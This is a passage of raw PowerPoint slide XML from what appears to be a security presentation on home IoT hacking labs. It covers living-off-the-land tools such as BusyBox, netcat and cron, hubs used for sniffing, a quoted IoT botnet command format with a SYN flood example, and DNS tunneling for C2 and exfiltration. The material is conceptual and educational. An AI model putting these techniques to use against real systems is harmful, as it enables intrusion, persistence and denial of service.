          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="1825625"/>
            <a:ext cx="5257800" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are an endless number of C2 frameworks, tools, reverse SSH handlers, proxies, and RMM tools available for little to no money.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You now have devices to test with, simulate with, isolate in a lab and safely, ethically &amp; LEGALLY. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can target vulns, specific items, setup your own capabilities, refine your techniques, come up with new ideas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Better… if you want to start crafting your own implants / tools / techniques for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, you now have a factory / method to do it yourself and customize it!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s go back to the beginning…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572F148-0BF3-6864-A6F1-C18AF50AA510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448425" y="1825625"/>
            <a:ext cx="5918396" cy="4140538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2652833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BB8A3-AD50-5452-A58A-220640C1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A2F72-92AD-8459-8878-37E399B4B678}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Living off the Land - </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF777B40-E818-24DD-E560-FB6A6304796B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"Living off the land" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LotL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers use legitimate tools and features already present on a target system to carry out malicious activities, rather than deploying custom malware or hacking tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Using Built-in Tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Attackers leverage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>native operating system utilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerShell (Windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Management Instrumentation (WMI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command prompt utilities (cmd.exe)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Bash and system utilities (Linux/Unix)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Administrative tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, or scheduled tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Advantages for Attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Stealth: Harder to detect since these are legitimate tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypass Security: Less likely to trigger antivirus alerts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>No Malware Needed: No need to upload suspicious files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistence: Can maintain access using legitimate system features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29EBD5E8-C505-0C78-FF0F-488D8AAC3D8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Common IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>LotL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Built-in Linux Utilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Most IoT devices run stripped-down Linux versions with basic tools that attackers exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>BusyBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: A single binary containing many Unix utilities (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, telnet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Shell scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/ash for command execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: For network connections and data transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: For persistence and scheduled tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Legitimate Protocols</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Telnet/SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Default or weak credentials exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>TFTP/FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Downloading additional payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTTP/HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Command and control communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Covert channels for C2 communications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2828169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F19CB6-F3EC-38BB-229F-07FA3824CCAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What are some techniques &amp; ideas that advanced APT groups leverage that you now have at your disposal?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0249C40-A35C-306B-44FD-9E099F21A727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Funny you should ask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>…. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64074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09755" y="3631975"/>
            <a:ext cx="10782343" cy="2790130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="108847" tIns="54423" rIns="108847" bIns="54423" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2177" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>A Hub is just a “dumb” connector. There is no signal processing or regeneration, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2177" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>VLAN’ing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2177" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, layer 2/3 controls. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2177" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2177" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Hubs are repeaters: Hubs retransmit signal to every port except the port from where signal is received. Hubs are one of.. If not THE best network protocol &amp; hacking tools you can find. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2177" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2177" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>JUST TURN ON WIRESHARK!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609755" y="435895"/>
            <a:ext cx="10969994" cy="818814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="1440"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5321" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>What is a Hub?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5321" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="973606" y="1341997"/>
            <a:ext cx="9227546" cy="2001633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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4F3D-3FE9-CB12-636C-7CF44CC25047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IoT Botnets – Genius use of Low Resource Hacking and Building Your Own Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6B21C5E-A674-CF33-D733-1608D316B1E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="6096000" cy="4163109"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>IoT Botnets are NOT exotic or overly complex. The best are simple, effective, efficient, pragmatic!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>“The command messages are text messages with a message length of two bytes added at the beginning, and use the following structure:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;Message Length 2 bytes&gt;.&lt;Text Message&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The text message portion is a string that represents the command and arguments separated by spaces (for example, a message like "syn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xxx.xxx.xxx.xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> 0 0 60 1"). This command means that it will perform a SYN Flood attack for 60 seconds on a random port number (0 meaning random) of the attack target IP address indicated by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xxx.xxx.xxx.xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>We found that the commands shown in Table 1 may be used. From the identified commands, we discovered that hosts infected with this malware may not only participate in DDoS attacks, but could also be used as part of an underground proxy service. Table 1 shows the commands that were identified through the analysis.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5B33D1-4112-3D23-26A1-1A27E455EAE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6850250" y="1825625"/>
            <a:ext cx="4646194" cy="4048125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7140AFFE-455E-FB66-C986-AB62A7DC07BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125347" y="5988734"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>IoT Botnet Linked to Large-scale DDoS Attacks Since the End of 2024 | Trend Micro (US)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2407270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FBC9-24EE-CCF7-1C92-6E685989C6E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS Tunneling and DDNS Based Beaconing inside Device Self-Registration Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB4F1E61-AB66-D642-316B-B53EEEC6B910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="4914900" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Bad actors use DNS tunneling to get data through firewalls. DNS tunneling encodes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>command and control (C&amp;C)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> messages or small amounts of data into inconspicuous DNS responses and queries. Since DNS messages can only contain a small amount of data, any commands must be small and data exfiltration happens slowly. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Suspicious DNS traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be difficult to detect because DNS is a noisy protocol, making it harder to distinguish a normal host query and normal DNS traffic from malicious activity.”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>How it works:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The bad actor has a server running malware on it, with a domain pointing to that server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker uses a host they have infected with malware to query for the attacker-controlled domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the DNS resolver routes the query, it creates a tunnel from the attacker to their target, allowing them to get data, remotely control the host, or otherwise take the next step in the attack chain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DNS Tunneling Attack: Definition, Examples, and Prevention | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ExtraHop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Another good source:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>DNS Tunneling attack - What is it, and how to protect ourselves? - </a:t>
            </a:r>
            <a:r>
